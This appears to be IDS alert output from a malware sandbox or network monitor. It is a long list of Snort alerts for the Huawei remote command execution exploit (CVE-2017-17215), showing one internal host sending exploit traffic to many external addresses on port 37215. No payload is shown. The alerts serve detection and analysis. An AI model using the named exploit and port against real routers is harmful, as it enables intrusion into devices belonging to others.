                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:55450 -> 197.136.147.208:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:36880 -> 41.39.58.194:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:36880 -> 41.39.58.194:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:58406 -> 41.96.223.152:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:58406 -> 41.96.223.152:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:47258 -> 156.53.22.9:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:47258 -> 156.53.22.9:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:34288 -> 41.25.194.157:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:34288 -> 41.25.194.157:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:46542 -> 41.104.63.204:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:46542 -> 41.104.63.204:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:35868 -> 156.95.138.20:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:35868 -> 156.95.138.20:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:37366 -> 156.121.47.77:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:37366 -> 156.121.47.77:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:45454 -> 156.214.90.252:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:45454 -> 156.214.90.252:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:59352 -> 156.150.23.167:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:59352 -> 156.150.23.167:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:54480 -> 156.122.69.214:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:54480 -> 156.122.69.214:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:51348 -> 156.239.255.247:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:51348 -> 156.239.255.247:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:46750 -> 197.163.24.189:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:46750 -> 197.163.24.189:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:56984 -> 197.111.198.15:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:56984 -> 197.111.198.15:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:56120 -> 197.161.54.138:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:56120 -> 197.161.54.138:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:41148 -> 41.65.170.88:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:41148 -> 41.65.170.88:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:42064 -> 41.166.206.128:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:42064 -> 41.166.206.128:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:52430 -> 156.53.176.64:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:52430 -> 156.53.176.64:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:51364 -> 197.37.227.10:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:51364 -> 197.37.227.10:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:59940 -> 197.224.71.250:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:59940 -> 197.224.71.250:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:60730 -> 156.74.213.254:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:60730 -> 156.74.213.254:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:50570 -> 197.171.154.221:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:50570 -> 197.171.154.221:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:33424 -> 156.13.235.110:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:33424 -> 156.13.235.110:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:35458 -> 41.206.192.149:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:35458 -> 41.206.192.149:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:56152 -> 197.181.204.177:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:56152 -> 197.181.204.177:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:35016 -> 41.123.150.169:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:35016 -> 41.123.150.169:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:39586 -> 156.107.88.231:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:39586 -> 156.107.88.231:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:52570 -> 197.247.234.164:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:52570 -> 197.247.234.164:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:58796 -> 156.240.150.152:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:58796 -> 156.240.150.152:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:57868 -> 41.166.144.123:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:57868 -> 41.166.144.123:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:39466 -> 197.233.30.78:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:39466 -> 197.233.30.78:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:39184 -> 197.240.94.26:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:39184 -> 197.240.94.26:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:57980 -> 197.50.119.185:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:57980 -> 197.50.119.185:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:40290 -> 41.212.57.218:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:40290 -> 41.212.57.218:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:52042 -> 197.75.24.151:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:52042 -> 197.75.24.151:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:58090 -> 197.191.254.222:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:58090 -> 197.191.254.222:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:35664 -> 156.70.154.169:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:35664 -> 156.70.154.169:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:40918 -> 41.45.227.75:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:40918 -> 41.45.227.75:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:46556 -> 156.23.36.202:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:46556 -> 156.23.36.202:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:52090 -> 197.73.108.89:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:52090 -> 197.73.108.89:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:43528 -> 156.13.174.42:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:43528 -> 156.13.174.42:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:53932 -> 197.204.104.152:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:53932 -> 197.204.104.152:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:56988 -> 197.219.159.225:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:56988 -> 197.219.159.225:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:44884 -> 197.73.253.240:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:44884 -> 197.73.253.240:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:51468 -> 156.198.108.43:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:51468 -> 156.198.108.43:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:54664 -> 41.10.51.214:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:54664 -> 41.10.51.214:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:47376 -> 156.128.6.30:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:47376 -> 156.128.6.30:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:54864 -> 197.136.204.131:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:54864 -> 197.136.204.131:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:48900 -> 156.172.161.20:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:48900 -> 156.172.161.20:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:43130 -> 41.231.252.57:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:43130 -> 41.231.252.57:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:52318 -> 197.20.145.2:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:52318 -> 197.20.145.2:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:50294 -> 156.33.12.217:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:50294 -> 156.33.12.217:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:49798 -> 156.104.167.238:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:49798 -> 156.104.167.238:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:56648 -> 41.23.70.120:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:56648 -> 41.23.70.120:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:58330 -> 197.210.203.172:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:58330 -> 197.210.203.172:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:55506 -> 197.150.58.36:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:55506 -> 197.150.58.36:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:36534 -> 41.211.18.138:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:36534 -> 41.211.18.138:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:43042 -> 156.41.216.245:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:43042 -> 156.41.216.245:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:55996 -> 197.244.234.190:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:55996 -> 197.244.234.190:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:42194 -> 197.63.157.30:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:42194 -> 197.63.157.30:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:54130 -> 197.86.144.0:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:54130 -> 197.86.144.0:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:54260 -> 41.55.199.105:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:54260 -> 41.55.199.105:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:42314 -> 197.142.240.129:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:42314 -> 197.142.240.129:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:42368 -> 156.49.114.156:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:42368 -> 156.49.114.156:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:51166 -> 197.50.232.201:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:51166 -> 197.50.232.201:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:33360 -> 197.144.100.35:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:33360 -> 197.144.100.35:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:49032 -> 197.255.122.101:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:49032 -> 197.255.122.101:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:37556 -> 197.152.249.204:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:37556 -> 197.152.249.204:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:34282 -> 197.107.104.42:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:34282 -> 197.107.104.42:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:45066 -> 156.115.89.207:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:45066 -> 156.115.89.207:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:36476 -> 41.127.142.60:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:36476 -> 41.127.142.60:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:56876 -> 41.237.145.22:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:56876 -> 41.237.145.22:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:35998 -> 197.61.126.76:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:35998 -> 197.61.126.76:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:36912 -> 156.87.220.158:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:36912 -> 156.87.220.158:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:38572 -> 197.16.96.59:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:38572 -> 197.16.96.59:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:41390 -> 197.42.14.45:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:41390 -> 197.42.14.45:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:35428 -> 156.230.56.126:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:35428 -> 156.230.56.126:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:59312 -> 156.181.84.194:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:59312 -> 156.181.84.194:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:50194 -> 197.173.194.201:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:50194 -> 197.173.194.201:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:43730 -> 41.92.62.246:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:43730 -> 41.92.62.246:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:41646 -> 197.3.132.219:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:41646 -> 197.3.132.219:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:58474 -> 197.79.30.8:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:58474 -> 197.79.30.8:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:57878 -> 197.146.24.147:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:57878 -> 197.146.24.147:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:38290 -> 41.9.242.9:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:38290 -> 41.9.242.9:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:53880 -> 156.128.98.241:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:53880 -> 156.128.98.241:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:53714 -> 197.99.61.27:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:53714 -> 197.99.61.27:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:49788 -> 156.242.101.133:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:49788 -> 156.242.101.133:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:42234 -> 41.180.19.47:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:42234 -> 41.180.19.47:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:40462 -> 41.137.106.91:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:40462 -> 41.137.106.91:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:39500 -> 197.114.97.36:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:39500 -> 197.114.97.36:37215
